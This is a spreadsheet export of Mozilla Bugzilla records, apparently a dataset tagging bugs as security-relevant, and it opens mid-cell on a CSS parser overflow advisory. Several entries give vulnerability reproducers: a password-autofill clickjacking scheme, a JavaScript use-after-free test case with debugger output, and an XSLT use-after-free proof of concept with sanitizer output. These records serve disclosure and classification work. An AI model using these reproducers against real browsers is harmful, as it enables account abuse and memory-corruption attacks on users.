    Timestamp:        Thu Apr 01 10:38:42 2010 (4BB4BE02)
    CheckSum:         000EA924
    ImageSize:        000E0000
    File version:     1.9.2.3743
    Product version:  3.6.3.0
Platform(s) tested:
Windows XP SP3 x86
http://mxr.mozilla.org/mozilla1.9.2/source/layout/style/nsCSSParser.cpp#7893
// alloc:
7892   nsRefPtr&lt;nsCSSValue::Array&gt; srcVals
7893     = nsCSSValue::Array::Create(values.Length());
// overflow: 
7899   PRUint32 i;
7900   for (i = 0; i &lt; values.Length(); i++)
7901     srcVals-&gt;Item(i) = values[i];
-- CREDIT --------------------------------------------------------------
This vulnerability was discovered by:
    * J23 (http://twitter.com/HansJ23)</t>
        </is>
      </c>
      <c r="X5852" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5853">
      <c r="A5853" t="n">
        <v>1344034</v>
      </c>
      <c r="B5853" t="inlineStr">
        <is>
          <t>2017-03-02 14:10:33 -0800</t>
        </is>
      </c>
      <c r="C5853" t="inlineStr">
        <is>
          <t>A single RWX page is getting allocated on Windows</t>
        </is>
      </c>
      <c r="D5853" t="inlineStr">
        <is>
          <t>2024-05-30 09:29:52 -0700</t>
        </is>
      </c>
      <c r="E5853" t="n">
        <v>1</v>
      </c>
      <c r="F5853" t="n">
        <v>1</v>
      </c>
      <c r="G5853" t="n">
        <v>3</v>
      </c>
      <c r="H5853" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5853" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5853" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K5853" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5853" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5853" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5853" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5853" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5853" t="inlineStr">
        <is>
          <t>[adv-main55+][adv-esr52.3+]</t>
        </is>
      </c>
      <c r="Q5853" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5853" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5853" t="inlineStr">
        <is>
          <t>mozilla55</t>
        </is>
      </c>
      <c r="T5853" t="n">
        <v>1</v>
      </c>
      <c r="U5853" t="n">
        <v>0</v>
      </c>
      <c r="V5853" t="n">
        <v>15</v>
      </c>
      <c r="W5853" t="inlineStr">
        <is>
          <t>On Windows, I frequently see a single RWX ("Execute/Read/Write") 4k block (a single page). Occasionally I see two. This was observed with both Firefox Nightly and Release. This violates Firefox's W^X/DEP protection.
STR:
1. Download VMMap (https://technet.microsoft.com/en-us/sysinternals/vmmap.aspx) and run it.
2. Choose File &gt; Select Process... &gt; Launch and Trace a New Process &gt; Application and select firefox.exe
3. Look at the "Details" block (bottom half of the VMMap window) and sort by "Protection". One or two "Execute/Read/Write" blocks of 4k each are typically visible.
(I have tried to click the "Heap Allocations..." button to examine the RWX page's allocation call stack, but the button remains disabled. I don't know why.)
Desired result:
No "Execute/Read/Write" blocks should be produced.
Also, it would be nice to add an automated test that detects such RWX blocks in the future.</t>
        </is>
      </c>
      <c r="X5853" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5854">
      <c r="A5854" t="n">
        <v>610997</v>
      </c>
      <c r="B5854" t="inlineStr">
        <is>
          <t>2010-11-10 07:25:12 -0800</t>
        </is>
      </c>
      <c r="C5854" t="inlineStr">
        <is>
          <t>Username + Password Autofill allows Forced Login via Clickjacking</t>
        </is>
      </c>
      <c r="D5854" t="inlineStr">
        <is>
          <t>2024-06-02 18:40:02 -0700</t>
        </is>
      </c>
      <c r="E5854" t="n">
        <v>1</v>
      </c>
      <c r="F5854" t="n">
        <v>1</v>
      </c>
      <c r="G5854" t="n">
        <v>3</v>
      </c>
      <c r="H5854" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5854" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J5854" t="inlineStr">
        <is>
          <t>Password Manager</t>
        </is>
      </c>
      <c r="K5854" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5854" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5854" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5854" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5854" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5854" t="inlineStr">
        <is>
          <t>[security:passwords][adv-main83-]</t>
        </is>
      </c>
      <c r="Q5854" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R5854" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5854" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5854" t="n">
        <v>1</v>
      </c>
      <c r="U5854" t="n">
        <v>1</v>
      </c>
      <c r="V5854" t="n">
        <v>6</v>
      </c>
      <c r="W5854" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12
Build Identifier: 
The Firefox password manager will auto-fill a user's username and password in a login form, even if the page is loaded an IFRAME. A malicious site could use a clickjacking attack to force a user to log into a particular site, and then peform some other attack the required the user to be authenticated.
Example: A user has stored their credentials for foo.com in the Firefox password manager. An attacker knows of a vunlerability (e.g. XSS, CSRF) in foo.com and creates a malicious page to which he lures the user. The page can (optionally) use bug #583889 to check if the user is logged into the site. If not, the attacker can load up foo.com/login#login_btn into a hidden iframe and get the user to click. Because Firefox has auto-filled the user's credentials, the user will unknowingly log into the site. The attacker can then exploit the particular vulnerability in the user's authenticated session.
Some sites, (e.g. Google) will focus the password field if they detect that the username has been filled in. In this case, a malicious site could automatically detect whether the credentials for that site were auto-filled or not. 
Safari is not vulnerable to this attack, as it does not autofill login forms inside iframes. IE is not vulnerable either, because it requires the user to first select their username from a drop-down list before auto-completing the password.
Reproducible: Always
Steps to Reproduce:
1. Save credentials for site in Password Manager
2. Load site in iframe on another domain
Actual Results:  
Username and password are prefilled
Expected Results:  
Credentials should not be prefilled</t>
        </is>
      </c>
      <c r="X5854" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5855">
      <c r="A5855" t="n">
        <v>1357668</v>
      </c>
      <c r="B5855" t="inlineStr">
        <is>
          <t>2017-04-19 01:43:13 -0700</t>
        </is>
      </c>
      <c r="C5855" t="inlineStr">
        <is>
          <t>[UX] The UX specs for the onBoarding tour notifications</t>
        </is>
      </c>
      <c r="D5855" t="inlineStr">
        <is>
          <t>2017-08-10 12:26:52 -0700</t>
        </is>
      </c>
      <c r="E5855" t="n">
        <v>1</v>
      </c>
      <c r="F5855" t="n">
        <v>1</v>
      </c>
      <c r="G5855" t="n">
        <v>2</v>
      </c>
      <c r="H5855" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5855" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J5855" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5855" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5855" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5855" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5855" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5855" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5855" t="inlineStr">
        <is>
          <t>[photon-onboarding][ux]</t>
        </is>
      </c>
      <c r="Q5855" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5855" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5855" t="inlineStr">
        <is>
          <t>Firefox 55</t>
        </is>
      </c>
      <c r="T5855" t="n">
        <v>1</v>
      </c>
      <c r="U5855" t="n">
        <v>0</v>
      </c>
      <c r="V5855" t="n">
        <v>10</v>
      </c>
      <c r="W5855" t="inlineStr">
        <is>
          <t>[UX] The UX specs for the onBoarding tour notifications</t>
        </is>
      </c>
      <c r="X5855" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5856">
      <c r="A5856" t="n">
        <v>749039</v>
      </c>
      <c r="B5856" t="inlineStr">
        <is>
          <t>2012-04-25 17:46:39 -0700</t>
        </is>
      </c>
      <c r="C5856" t="inlineStr">
        <is>
          <t>Assertion failure: addr % Cell::CellSize == 0, at ../../jsgc.h:859 or Crash [@ js::gc::Cell::compartment]</t>
        </is>
      </c>
      <c r="D5856" t="inlineStr">
        <is>
          <t>2013-01-14 08:20:48 -0800</t>
        </is>
      </c>
      <c r="E5856" t="n">
        <v>1</v>
      </c>
      <c r="F5856" t="n">
        <v>1</v>
      </c>
      <c r="G5856" t="n">
        <v>3</v>
      </c>
      <c r="H5856" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5856" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5856" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K5856" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5856" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5856" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5856" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5856" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5856" t="inlineStr">
        <is>
          <t>[sg:critical] js-triage-needed[advisory-tracking+]</t>
        </is>
      </c>
      <c r="Q5856" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5856" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5856" t="inlineStr">
        <is>
          <t>mozilla15</t>
        </is>
      </c>
      <c r="T5856" t="n">
        <v>1</v>
      </c>
      <c r="U5856" t="n">
        <v>0</v>
      </c>
      <c r="V5856" t="n">
        <v>10</v>
      </c>
      <c r="W5856" t="inlineStr">
        <is>
          <t>The following test asserts/crashes on mozilla-central revision 75c7378c87b6 (options -m -n -a):
gczeal(4);
try { jsTestDriverEnd(); } catch(exc1) {}
evaluate("\
schedulegc(10);\
for(var i=0; i&lt;3; i++) {\
    var obj = { first: 'first', second: 'second' };\
    for (var elem in obj) {}\
    x.push(count);\
}\
");
Backtrace in debug build after stepping through assertion:
Program received signal SIGSEGV, Segmentation fault.
0x0804c7cd in js::gc::Cell::compartment (this=0xdadadada) at ../../jsgc.h:984
984         return arenaHeader()-&gt;compartment;
(gdb) bt 8
#0  0x0804c7cd in js::gc::Cell::compartment (this=0xdadadada) at ../../jsgc.h:984
#1  0x0811e8f5 in js::gc::CheckMarkedThing&lt;js::types::TypeObject&gt; (trc=0x85fe540, thing=0xdadadada) at /srv/repos/mozilla-central/js/src/jsgcmark.cpp:80
#2  0x0811c888 in js::gc::MarkInternal&lt;js::types::TypeObject&gt; (trc=0x85fe540, thingp=0xf750af24) at /srv/repos/mozilla-central/js/src/jsgcmark.cpp:102
#3  0x0811bf41 in js::gc::Mark&lt;js::types::TypeObject&gt; (trc=0x85fe540, thing=0xf750af24, name=0x845dbdc "type") at /srv/repos/mozilla-central/js/src/jsgcmark.cpp:141
#4  0x08117074 in js::gc::MarkTypeObject (trc=0x85fe540, thing=0xf750af24, name=0x845dbdc "type") at /srv/repos/mozilla-central/js/src/jsgcmark.cpp:217
#5  0x0828cf0d in js::ObjectImpl::markChildren (this=0xf750af20, trc=0x85fe540) at /srv/repos/mozilla-central/js/src/vm/ObjectImpl.cpp:157
#6  0x081189db in js::gc::MarkChildren (trc=0x85fe540, obj=0xf750af20) at /srv/repos/mozilla-central/js/src/jsgcmark.cpp:675
#7  0x08119fa2 in js::TraceChildren (trc=0x85fe540, thing=0xf750af20, kind=JSTRACE_OBJECT) at /srv/repos/mozilla-central/js/src/jsgcmark.cpp:1160
(More stack frames follow...)
(gdb) x /i $pc
=&gt; 0x804c7cd &lt;js::gc::Cell::compartment() const+17&gt;:    mov    (%eax),%eax
(gdb) info reg eax
eax            0xdadad000       -623194112
Assuming s-s and sg:critical due to use-after-free condition.</t>
        </is>
      </c>
      <c r="X5856" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5857">
      <c r="A5857" t="n">
        <v>1864123</v>
      </c>
      <c r="B5857" t="inlineStr">
        <is>
          <t>2023-11-10 00:32:23 -0800</t>
        </is>
      </c>
      <c r="C5857" t="inlineStr">
        <is>
          <t>EncryptingOutputStream can write random contents of memory to its base stream</t>
        </is>
      </c>
      <c r="D5857" t="inlineStr">
        <is>
          <t>2024-04-28 23:52:39 -0700</t>
        </is>
      </c>
      <c r="E5857" t="n">
        <v>1</v>
      </c>
      <c r="F5857" t="n">
        <v>1</v>
      </c>
      <c r="G5857" t="n">
        <v>3</v>
      </c>
      <c r="H5857" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5857" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5857" t="inlineStr">
        <is>
          <t>Storage: Quota Manager</t>
        </is>
      </c>
      <c r="K5857" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5857" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5857" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5857" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5857" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5857" t="inlineStr">
        <is>
          <t>[adv-main121+][adv-esr115.6+]</t>
        </is>
      </c>
      <c r="Q5857" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5857" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S5857" t="inlineStr">
        <is>
          <t>122 Branch</t>
        </is>
      </c>
      <c r="T5857" t="n">
        <v>1</v>
      </c>
      <c r="U5857" t="n">
        <v>0</v>
      </c>
      <c r="V5857" t="n">
        <v>30</v>
      </c>
      <c r="W5857" t="inlineStr">
        <is>
          <t>EncryptingOutputStream can write random contents of memory to its base stream. This can happen when original data is smaller than 4K. The stream encrypts only actual payload, but data is written to the base stream in whole 4K blocks. EncryptingOutputStream is used by IndexedDB and CacheAPI to store data on disk for private browsing, so the base stream in that case is quota::FileOutputStream, so random contents of memory can end up being stored on disk.
We have a fix for this which fills unused payload with random values.
We suggest to treat this as sec-other since Cache API in private browsing is still gated by a pref and it' still disabled by default. The issue is more serious in the Cache API case, because files stored on disk are fundamental part of the implementation. IndexedDB stores data in separate files only to support storing of DOM Blobs/Files which is not used so often.
IndexedDB in private browsing shipped in FF 115, so the fix might need to be uplifted even to ESR 115.</t>
        </is>
      </c>
      <c r="X5857" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5858">
      <c r="A5858" t="n">
        <v>411433</v>
      </c>
      <c r="B5858" t="inlineStr">
        <is>
          <t>2008-01-08 18:49:24 -0800</t>
        </is>
      </c>
      <c r="C5858" t="inlineStr">
        <is>
          <t>file location URL in directory listing should be HTML escaped</t>
        </is>
      </c>
      <c r="D5858" t="inlineStr">
        <is>
          <t>2016-06-22 12:16:36 -0700</t>
        </is>
      </c>
      <c r="E5858" t="n">
        <v>1</v>
      </c>
      <c r="F5858" t="n">
        <v>1</v>
      </c>
      <c r="G5858" t="n">
        <v>6</v>
      </c>
      <c r="H5858" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5858" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J5858" t="inlineStr">
        <is>
          <t>File Handling</t>
        </is>
      </c>
      <c r="K5858" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5858" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5858" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5858" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5858" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5858" t="inlineStr">
        <is>
          <t>[sg:low]</t>
        </is>
      </c>
      <c r="Q5858" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5858" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5858" t="inlineStr">
        <is>
          <t>mozilla1.9</t>
        </is>
      </c>
      <c r="T5858" t="n">
        <v>1</v>
      </c>
      <c r="U5858" t="n">
        <v>0</v>
      </c>
      <c r="V5858" t="n">
        <v>48</v>
      </c>
      <c r="W5858" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.9b3pre) Gecko/2008010813 Minefield/3.0b3pre
Build Identifier: 
When dropping file (its name contains %) from Explorer (or desktop) to browser,
browser opens incorrect file.
Reproducible: Always
Steps to Reproduce:
1.Create file named test&amp;gt%21.html in a foloder
2.Open the folder with browser.
3.Click link to test&amp;gt%21.html
Actual Results:  
Error (File not found) for Firefox can't find the file at test&gt;%21.html.
Expected Results:  
File should be opened.
According to DOM inspector,
Value of href of "A" element in directory view is "test&gt;%2521.html",
So, it should be "test&amp;gt;%2521.html"</t>
        </is>
      </c>
      <c r="X5858" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5859">
      <c r="A5859" t="n">
        <v>524796</v>
      </c>
      <c r="B5859" t="inlineStr">
        <is>
          <t>2009-10-27 15:19:08 -0700</t>
        </is>
      </c>
      <c r="C5859" t="inlineStr">
        <is>
          <t>qm-codecover02 is not at the same software level as regular build machines</t>
        </is>
      </c>
      <c r="D5859" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E5859" t="n">
        <v>1</v>
      </c>
      <c r="F5859" t="n">
        <v>1</v>
      </c>
      <c r="G5859" t="n">
        <v>5</v>
      </c>
      <c r="H5859" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5859" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J5859" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5859" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L5859" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5859" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5859" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5859" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5859" t="inlineStr"/>
      <c r="Q5859" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5859" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5859" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5859" t="n">
        <v>1</v>
      </c>
      <c r="U5859" t="n">
        <v>0</v>
      </c>
      <c r="V5859" t="n">
        <v>16</v>
      </c>
      <c r="W5859" t="inlineStr">
        <is>
          <t>Build machines use gcc4.3.3 to build trunk. qm-codecover02 software stack is supposed to replicate the build CentOS software stack. I suspect that is not the case. Can you please refresh the qm-codecover02 to latest nightly trunk build machine's level with out losing my $HOME contents?
Thanks
Murali</t>
        </is>
      </c>
      <c r="X5859" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5860">
      <c r="A5860" t="n">
        <v>1352133</v>
      </c>
      <c r="B5860" t="inlineStr">
        <is>
          <t>2017-03-30 10:24:04 -0700</t>
        </is>
      </c>
      <c r="C5860" t="inlineStr">
        <is>
          <t>Crash in java.lang.NullPointerException: Attempt to invoke virtual method ''java.lang.String org.mozilla.gecko.Tab.getMostRecentHomePanel()'' on a null object reference at org.mozilla.gecko.BrowserApp.hideBrowserSearch(BrowserApp.java)</t>
        </is>
      </c>
      <c r="D5860" t="inlineStr">
        <is>
          <t>2020-12-21 10:38:46 -0800</t>
        </is>
      </c>
      <c r="E5860" t="n">
        <v>1</v>
      </c>
      <c r="F5860" t="n">
        <v>1</v>
      </c>
      <c r="G5860" t="n">
        <v>6</v>
      </c>
      <c r="H5860" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5860" t="inlineStr">
        <is>
          <t>Firefox for Android Graveyard</t>
        </is>
      </c>
      <c r="J5860" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5860" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5860" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5860" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N5860" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5860" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5860" t="inlineStr"/>
      <c r="Q5860" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5860" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5860" t="inlineStr">
        <is>
          <t>Firefox 59</t>
        </is>
      </c>
      <c r="T5860" t="n">
        <v>1</v>
      </c>
      <c r="U5860" t="n">
        <v>0</v>
      </c>
      <c r="V5860" t="n">
        <v>18</v>
      </c>
      <c r="W5860" t="inlineStr">
        <is>
          <t>This bug was filed from the Socorro interface and is 
report bp-fd3c7eb4-8384-4a76-9017-e77c42170329.
=============================================================
Looks like selected tab is null.</t>
        </is>
      </c>
      <c r="X5860" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5861">
      <c r="A5861" t="n">
        <v>570729</v>
      </c>
      <c r="B5861" t="inlineStr">
        <is>
          <t>2010-06-08 09:16:17 -0700</t>
        </is>
      </c>
      <c r="C5861" t="inlineStr">
        <is>
          <t>Create intermediary page to download beta</t>
        </is>
      </c>
      <c r="D5861" t="inlineStr">
        <is>
          <t>2011-06-23 09:29:15 -0700</t>
        </is>
      </c>
      <c r="E5861" t="n">
        <v>1</v>
      </c>
      <c r="F5861" t="n">
        <v>1</v>
      </c>
      <c r="G5861" t="n">
        <v>6</v>
      </c>
      <c r="H5861" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5861" t="inlineStr">
        <is>
          <t>Input</t>
        </is>
      </c>
      <c r="J5861" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5861" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5861" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5861" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5861" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5861" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5861" t="inlineStr"/>
      <c r="Q5861" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5861" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5861" t="inlineStr">
        <is>
          <t>1.0</t>
        </is>
      </c>
      <c r="T5861" t="n">
        <v>1</v>
      </c>
      <c r="U5861" t="n">
        <v>0</v>
      </c>
      <c r="V5861" t="n">
        <v>7</v>
      </c>
      <c r="W5861" t="inlineStr">
        <is>
          <t>When a user accesses the Input app to provide feedback, but they don't have the latest Firefox beta, we need to show them a page explaining just that, and give them a way to download the latest beta.</t>
        </is>
      </c>
      <c r="X5861" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5862">
      <c r="A5862" t="n">
        <v>1146339</v>
      </c>
      <c r="B5862" t="inlineStr">
        <is>
          <t>2015-03-23 07:00:51 -0700</t>
        </is>
      </c>
      <c r="C5862" t="inlineStr">
        <is>
          <t>A variant of Bug 1144988 lets one bypass same-origin policy</t>
        </is>
      </c>
      <c r="D5862" t="inlineStr">
        <is>
          <t>2019-03-11 08:03:58 -0700</t>
        </is>
      </c>
      <c r="E5862" t="n">
        <v>1</v>
      </c>
      <c r="F5862" t="n">
        <v>1</v>
      </c>
      <c r="G5862" t="n">
        <v>3</v>
      </c>
      <c r="H5862" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5862" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5862" t="inlineStr">
        <is>
          <t>DOM: Navigation</t>
        </is>
      </c>
      <c r="K5862" t="inlineStr">
        <is>
          <t>36 Branch</t>
        </is>
      </c>
      <c r="L5862" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5862" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5862" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5862" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5862" t="inlineStr">
        <is>
          <t>[adv-main37+][adv-esr31.6+][bg2-adv-main2.2+]</t>
        </is>
      </c>
      <c r="Q5862" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5862" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5862" t="inlineStr">
        <is>
          <t>mozilla39</t>
        </is>
      </c>
      <c r="T5862" t="n">
        <v>1</v>
      </c>
      <c r="U5862" t="n">
        <v>0</v>
      </c>
      <c r="V5862" t="n">
        <v>39</v>
      </c>
      <c r="W5862" t="inlineStr">
        <is>
          <t>Created attachment 8581614
moz-poc1.html
Bz got this idea
1) Start a new load.
2) Do an anchor scroll (this does not cancel the load, iirc).
3) Use the mutation event to wait until the load we started completes. 
There are few options to fix this, at least
* Use the original patch for bug 1144988
* Add some more checks to doShortCircuitedLoad so that we just bail out early
  if anchor scrolling changes docshell's state to something unexpected.</t>
        </is>
      </c>
      <c r="X5862" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5863">
      <c r="A5863" t="n">
        <v>1336830</v>
      </c>
      <c r="B5863" t="inlineStr">
        <is>
          <t>2017-02-05 13:36:29 -0800</t>
        </is>
      </c>
      <c r="C5863" t="inlineStr">
        <is>
          <t>UAF in nsTArray Length() during XSLT processing</t>
        </is>
      </c>
      <c r="D5863" t="inlineStr">
        <is>
          <t>2024-05-30 09:25:41 -0700</t>
        </is>
      </c>
      <c r="E5863" t="n">
        <v>1</v>
      </c>
      <c r="F5863" t="n">
        <v>1</v>
      </c>
      <c r="G5863" t="n">
        <v>3</v>
      </c>
      <c r="H5863" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5863" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5863" t="inlineStr">
        <is>
          <t>XSLT</t>
        </is>
      </c>
      <c r="K5863" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5863" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5863" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5863" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5863" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5863" t="inlineStr">
        <is>
          <t>[adv-main53+][adv-esr52.1+][adv-esr45.9+]</t>
        </is>
      </c>
      <c r="Q5863" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5863" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5863" t="inlineStr">
        <is>
          <t>mozilla55</t>
        </is>
      </c>
      <c r="T5863" t="n">
        <v>1</v>
      </c>
      <c r="U5863" t="n">
        <v>0</v>
      </c>
      <c r="V5863" t="n">
        <v>31</v>
      </c>
      <c r="W5863" t="inlineStr">
        <is>
          <t>XPCshell PoC
Tested under xpcshell "JavaScript-C54.0a1"
[+] Relevant parts
xsl_str = '&lt;xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="42"&gt;' +
          '  &lt;xsl:template match="*"&gt;' +
          '    &lt;xsl:apply-imports/&gt;' + 
          '    &lt;xsl:apply-templates select="."&gt;' + 
          '      &lt;xsl:with-param name="whatever_1"&gt;whatever_2&lt;/xsl:with-param&gt;' + 
          '    &lt;/xsl:apply-templates&gt;' +
          '  &lt;/xsl:template&gt;' +
          '&lt;/xsl:stylesheet&gt;'
[+] How to reproduce
$ ./poc_xslt_uaf_nsTArray_Length.js
==20267==ERROR: AddressSanitizer: heap-use-after-free on address 0x602000334890 at pc 0x7f04c798d7b9 bp 0x7ffd20419800 sp 0x7ffd204197f8
READ of size 8 at 0x602000334890 thread T0
    #0 0x7f04c798d7b8 in Length /home/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:515:37
    #1 0x7f04c798d7b8 in next /home/worker/workspace/build/src/dom/xslt/base/txExpandedNameMap.h:68
